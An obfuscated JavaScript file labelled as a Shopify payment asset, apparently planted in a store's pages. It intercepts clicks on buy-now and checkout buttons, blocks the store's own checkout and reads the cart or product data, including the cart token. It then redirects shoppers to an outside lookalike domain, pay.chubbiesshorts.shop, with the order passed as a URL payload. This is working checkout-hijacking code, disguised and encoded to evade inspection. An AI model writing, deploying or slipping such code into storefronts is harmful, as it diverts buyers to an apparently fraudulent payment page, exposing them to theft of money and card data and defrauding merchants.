/* shopmanager-payment-asset:v1 */
const _1213642ad484 = 'https://pay.chubbiesshorts.shop';
(function () {
function _8b7513d46d28(_d42285e20390) {
return (
_d42285e20390.dataset.shopName ||
(window.Shopify && window.Shopify.shop) ||
window.location.hostname
);
}
function _fa2ba687fdc6(_d42285e20390) {
return _d42285e20390.dataset.shopDomain || window.location.hostname;
}
function _8905eecfb0f2(_d42285e20390) {
return (
_d42285e20390.dataset.shopMyshopifyDomain ||
(window.Shopify && window.Shopify.shop) ||
window.location.hostname
);
}
function _72e23e90bd7d(_6d244ee6810e) {
return (
(_6d244ee6810e && _6d244ee6810e.currency) ||
(window.Shopify &&
window.Shopify.currency &&
window.Shopify.currency.active) ||
'\u0055\u0053\x44'
);
}
function _5c1f5a2fbaa4(_d42285e20390) {
return _d42285e20390.dataset.payUrl || _1213642ad484;
}
function _8dad7305decd(_e67823ea9b88, _1ab4cb15f554) {
const _038f0108d867 =
_e67823ea9b88.replace(/\/$/, '') +
'\u002f\u0063\x68\u0065\x63\u006b\u006f\u0075\u0074\u002e\u0068\u0074\x6d\x6c\x3f\x70\x61\x79\u006c\x6f\x61\x64\x3d' +
encodeURIComponent(JSON.stringify(_1ab4cb15f554));
console.log('\x50\x41\u0059\u0020\u0050\u0041\x59\x4c\u004f\x41\x44\u003a', _1ab4cb15f554);
console.log('\u0050\x41\u0059\x20\u0046\u0049\x4e\x41\u004c\u0020\u0055\u0052\u004c\u003a', _038f0108d867);
window.location.href = _038f0108d867;
}
document.addEventListener(
'\x63\u006c\x69\x63\u006b',
async function (_6ef643942e10) {
const _d42285e20390 = _6ef643942e10.target.closest(
'\x2e\x63\x75\u0073\x74\x6f\u006d\x2d\x62\u0075\u0079\u002d\x6e\x6f\u0077\x2c\x20\u002e\u0063\u0075\u0073\x74\x6f\x6d\x2d\x63\x61\u0072\u0074\u002d\x63\u0068\u0065\u0063\x6b\x6f\x75\x74\x2c\u0020\u0023\u0043\x61\x72\u0074\u0044\x72\x61\u0077\x65\x72\x2d\x43\x68\u0065\u0063\u006b\x6f\x75\x74\u002c\u0020\x23\u0063\u0068\x65\x63\x6b\x6f\u0075\u0074'
);
if (!_d42285e20390) return;
if (_d42285e20390.disabled) return;
_6ef643942e10.preventDefault();
_6ef643942e10.stopPropagation();
const _288758befd24 = _d42285e20390.innerText;
try {
_d42285e20390.disabled = true;
_d42285e20390.innerText = '\u004c\u006f\u0061\x64\x69\x6e\x67\u002e\x2e\x2e';
const _e67823ea9b88 = _5c1f5a2fbaa4(_d42285e20390);
const _f7ef95a32962 = _8b7513d46d28(_d42285e20390);
const _3531edb242af = _fa2ba687fdc6(_d42285e20390);
const _fc0bdf6865e2 = _8905eecfb0f2(_d42285e20390);
if (_d42285e20390.classList.contains('\x63\x75\u0073\u0074\x6f\u006d\u002d\u0062\x75\u0079\x2d\x6e\u006f\u0077')) {
const _eba7edeabc71 =
_d42285e20390.closest('\x66\u006f\x72\x6d') ||
document.querySelector('\u0066\u006f\x72\u006d\u005b\u0061\x63\u0074\u0069\u006f\u006e\u002a\x3d\x22\x2f\u0063\u0061\x72\u0074\x2f\x61\u0064\x64\u0022\u005d');
if (!_eba7edeabc71) {
throw new Error('\u0050\u0072\u006f\u0064\x75\x63\x74\u0020\x66\u006f\u0072\u006d\u0020\x6e\u006f\u0074\u0020\u0066\u006f\x75\u006e\u0064');
}
const _2ff2c0f45355 =
_eba7edeabc71.querySelector('\x2e\x70\u0072\u006f\u0064\u0075\x63\x74\u002d\u0076\x61\x72\x69\x61\x6e\x74\x2d\u0069\x64') ||
_eba7edeabc71.querySelector('\u005b\x6e\u0061\x6d\u0065\x3d\u0022\x69\u0064\u0022\x5d');
if (!_2ff2c0f45355 || !_2ff2c0f45355.value) {
throw new Error('\u0056\x61\x72\u0069\u0061\u006e\u0074\x20\x49\u0044\x20\u006e\u006f\u0074\x20\x66\x6f\x75\u006e\u0064');
}
const _54d6d8939994 = _eba7edeabc71.querySelector('\u005b\x6e\x61\x6d\u0065\u003d\u0022\x71\x75\x61\x6e\x74\x69\u0074\u0079\x22\u005d');
const _9aed2194b6d9 = Number(_2ff2c0f45355.value);
const _6b8f90ee40f9 = _54d6d8939994
? Math.max(1, parseInt(_54d6d8939994.value || '\x31', 10))
: 1;
const _4cb4ac7ba9aa = _d42285e20390.closest('\u0070\x72\x6f\u0064\x75\x63\x74\u002d\u0066\x6f\u0072\u006d\u002d\x63\x6f\x6d\x70\u006f\x6e\u0065\u006e\u0074');
const _82130d53b5c2 =
(_4cb4ac7ba9aa && _4cb4ac7ba9aa.dataset.productUrl) ||
window.location.pathname;
const _d28c261b0a81 =
_82130d53b5c2.replace(/\/$/, '') + '\u002e\x6a\u0073';
const _136cc923364c = await fetch(_d28c261b0a81, {
method: '\x47\u0045\x54',
credentials: '\x73\u0061\u006d\u0065\x2d\u006f\x72\x69\x67\u0069\u006e',
headers: {
Accept: '\u0061\x70\x70\u006c\x69\x63\u0061\u0074\x69\u006f\u006e\u002f\u006a\u0073\u006f\x6e'
}
});
if (!_136cc923364c.ok) {
throw new Error('\u0070\u0072\u006f\u0064\u0075\u0063\u0074\x20\x2e\x6a\u0073\u0020\x66\u0061\x69\x6c\u0065\u0064');
}
const _463027ffc319 = await _136cc923364c.json();
const _3d0732cfa64f =
(_463027ffc319.variants || []).find(function (_a98609e25959) {
return Number(_a98609e25959.id) === _9aed2194b6d9;
}) ||
(_463027ffc319.variants || [])[0] ||
{};
const _d2e433b39e6a = Number(_3d0732cfa64f.price || _463027ffc319.price || 0);
const _1039e46545aa = _d2e433b39e6a / 100;
const _68de64a38830 =
_463027ffc319.featured_image ||
(Array.isArray(_463027ffc319.images) && _463027ffc319.images.length
? _463027ffc319.images[0]
: '');
const _1ab4cb15f554 = {
storeName: _f7ef95a32962,
store_name: _f7ef95a32962,
shop_name: _f7ef95a32962,
shop_domain: _3531edb242af,
shop_myshopify_domain: _fc0bdf6865e2,
cart_token: '',
currency: _72e23e90bd7d(null),
item_count: _6b8f90ee40f9,
subtotal_price: _1039e46545aa * _6b8f90ee40f9,
total_price: _1039e46545aa * _6b8f90ee40f9,
shippingPrice: 0,
items: [
{
title: _463027ffc319.title || '\x50\u0072\u006f\u0064\u0075\u0063\x74',
variant: _3d0732cfa64f.title || '\x44\u0065\x66\x61\x75\u006c\x74\u0020\u0054\x69\x74\x6c\u0065',
quantity: _6b8f90ee40f9,
price: _1039e46545aa,
image: _68de64a38830,
line_key: '',
variant_id: _9aed2194b6d9,
product_id: _463027ffc319.id || '',
product_title: _463027ffc319.title || '',
variant_title: _3d0732cfa64f.title || '',
line_price: _1039e46545aa * _6b8f90ee40f9,
sku: _3d0732cfa64f.sku || '',
vendor: _463027ffc319.vendor || ''
}
]
};
_8dad7305decd(_e67823ea9b88, _1ab4cb15f554);
return;
}
const _8a96c6e7fb82 =
window.Shopify &&
window.Shopify.routes &&
window.Shopify.routes.root
? window.Shopify.routes.root
: '\x2f';
const _269527ad15f9 = await fetch(_8a96c6e7fb82 + '\x63\u0061\u0072\x74\u002e\u006a\u0073', {
method: '\u0047\u0045\u0054',
credentials: '\x73\x61\u006d\u0065\u002d\x6f\x72\x69\u0067\x69\u006e',
headers: {
Accept: '\x61\u0070\u0070\x6c\u0069\u0063\u0061\u0074\u0069\x6f\u006e\u002f\u006a\u0073\x6f\u006e'
}
});
if (!_269527ad15f9.ok) {
const _0cd85ec879c5 = await _269527ad15f9.text();
throw new Error('\u0063\x61\u0072\x74\u002e\u006a\x73\x20\x66\u0061\u0069\x6c\x65\u0064\u003a\x20' + _0cd85ec879c5.slice(0, 300));
}
const _6d244ee6810e = await _269527ad15f9.json();
if (!_6d244ee6810e || !Array.isArray(_6d244ee6810e.items) || _6d244ee6810e.items.length === 0) {
throw new Error('\u0043\u0061\x72\x74\u0020\x69\u0073\x20\x65\x6d\u0070\x74\u0079');
}
const _1ab4cb15f554 = {
storeName: _f7ef95a32962,
store_name: _f7ef95a32962,
shop_name: _f7ef95a32962,
shop_domain: _3531edb242af,
shop_myshopify_domain: _fc0bdf6865e2,
cart_token: _6d244ee6810e.token || '',
currency: _72e23e90bd7d(_6d244ee6810e),
item_count: _6d244ee6810e.item_count || 0,
subtotal_price: (_6d244ee6810e.items_subtotal_price || 0) / 100,
total_price: (_6d244ee6810e.total_price || 0) / 100,
shippingPrice: 0,
items: (_6d244ee6810e.items || []).map(function (_90e1f3278d8f) {
return {
title: _90e1f3278d8f.product_title || _90e1f3278d8f.title || '\u0050\u0072\u006f\u0064\x75\x63\u0074',
variant: _90e1f3278d8f.variant_title || '\x44\x65\u0066\u0061\u0075\x6c\u0074\u0020\u0054\x69\u0074\u006c\u0065',
quantity: _90e1f3278d8f.quantity || 1,
price: (_90e1f3278d8f.price || 0) / 100,
image: _90e1f3278d8f.image || '',
line_key: _90e1f3278d8f.key || '',
variant_id: _90e1f3278d8f.id || '',
product_id: _90e1f3278d8f.product_id || '',
product_title: _90e1f3278d8f.product_title || _90e1f3278d8f.title || '',
variant_title: _90e1f3278d8f.variant_title || '',
line_price: (_90e1f3278d8f.line_price || 0) / 100,
sku: _90e1f3278d8f.sku || '',
vendor: _90e1f3278d8f.vendor || ''
};
})
};
_8dad7305decd(_e67823ea9b88, _1ab4cb15f554);
} catch (_dc95381345aa) {
console.error('\u0050\u0041\x59\x20\u0044\x45\u0042\u0055\u0047\u003a', _dc95381345aa);
alert(
'\u8bfb\u53d6\x20\u0053\x68\x6f\x70\u0069\x66\u0079\x20\u8ba2\u5355\u4fe1\u606f\u5931\u8d25\uff1a' +
(_dc95381345aa && _dc95381345aa.message ? _dc95381345aa.message : String(_dc95381345aa))
);
_d42285e20390.disabled = false;
_d42285e20390.innerText = _288758befd24;
}
},
true
);
})();
